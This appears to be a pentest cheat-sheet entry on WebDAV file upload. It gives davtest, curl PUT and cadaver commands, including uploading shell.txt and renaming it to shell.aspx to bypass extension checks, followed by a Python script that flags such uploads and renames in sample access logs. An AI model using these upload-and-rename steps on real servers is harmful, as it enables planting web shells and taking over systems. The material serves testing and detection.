WebDAV
Arbitrary file upload
Davtest can be used to test arbitrary file upload:
davtest -url ${url}
However, the tool sometimes returns false negatives, so manual testing is worthwhile:
# Upload the $(unknown) to ${filename_url} (--data-binary keeps the file intact; plain -d strips newlines)
curl -X PUT http://${ip}/${filename_url} --data-binary @$(unknown)
# Check whether the upload succeeded
curl http://${ip}/${filename_url}
Finally, cadaver is an interactive client that helps with uploading and managing uploaded files.
# Open the cadaver shell
cadaver http://${ip}/${directory}
# Files can be uploaded with `put`, directories changed with `cd` and files renamed with `mv`
dav:/${directory}/> cd ..
dav:/> put shell.txt
dav:/> mv shell.txt shell.aspx
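The PUT-then-MOVE sequence above (upload as .txt, rename to .aspx) defeats upload-time extension checks but leaves a clear trace in the access log. The following detection script is an added example, not from the original page; it runs over constructed Apache-style log lines that assume the Destination request header is logged (LogFormat with %{Destination}i) and flags executable uploads and staged renames.

```python
import re
from urllib.parse import urlparse

# Constructed sample access-log lines (not from the page): combined-style
# format extended with the Destination request header via %{Destination}i.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "OPTIONS /uploads/ HTTP/1.1" 200 0 "-"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "PUT /uploads/shell.txt HTTP/1.1" 201 0 "-"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "MOVE /uploads/shell.txt HTTP/1.1" 201 0 "http://10.0.0.9/uploads/shell.aspx"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "PUT /uploads/notes.txt HTTP/1.1" 201 0 "-"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /uploads/notes.txt HTTP/1.1" 200 12 "-"
10.0.0.8 - - [01/Jan/2024:10:00:06 +0000] "PUT /uploads/cmd.asp HTTP/1.1" 403 0 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<dest>[^"]*)"$'
)

# Extensions the web server would hand to a script engine (assumed list).
EXEC_EXT = (".asp", ".aspx", ".ashx", ".php", ".jsp", ".cgi")


def is_executable(path):
    return path.lower().endswith(EXEC_EXT)


def audit_webdav_log(log_text):
    """Return (kind, ip, source, target) tuples for WebDAV writes worth reviewing."""
    alerts = []
    uploaded = set()  # (ip, path) of successful PUTs seen so far
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line in another format: skip rather than crash
        ip, method, path = m["ip"], m["method"], m["path"]
        ok = m["status"].startswith("2")
        if method == "PUT":
            if ok:
                uploaded.add((ip, path))
            if is_executable(path):  # report blocked attempts too
                alerts.append(("executable_put" if ok else "blocked_executable_put", ip, path, path))
        elif method == "MOVE" and ok:
            target = urlparse(m["dest"]).path  # Destination is an absolute URL
            if is_executable(target):
                # A staged rename (PUT as .txt, then MOVE) bypasses upload-time extension checks.
                kind = "staged_move_to_executable" if (ip, path) in uploaded else "move_to_executable"
                alerts.append((kind, ip, path, target))
    return alerts


if __name__ == "__main__":
    for alert in audit_webdav_log(SAMPLE_LOG):
        print(alert)
```

The benign .txt upload from 10.0.0.7 produces no alert, while the staged rename and the rejected .asp upload do.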
The following blog post summarizes these attacks: https://null-byte.wonderhowto.com/how-to/exploit-webdav-server-get-shell-0204718/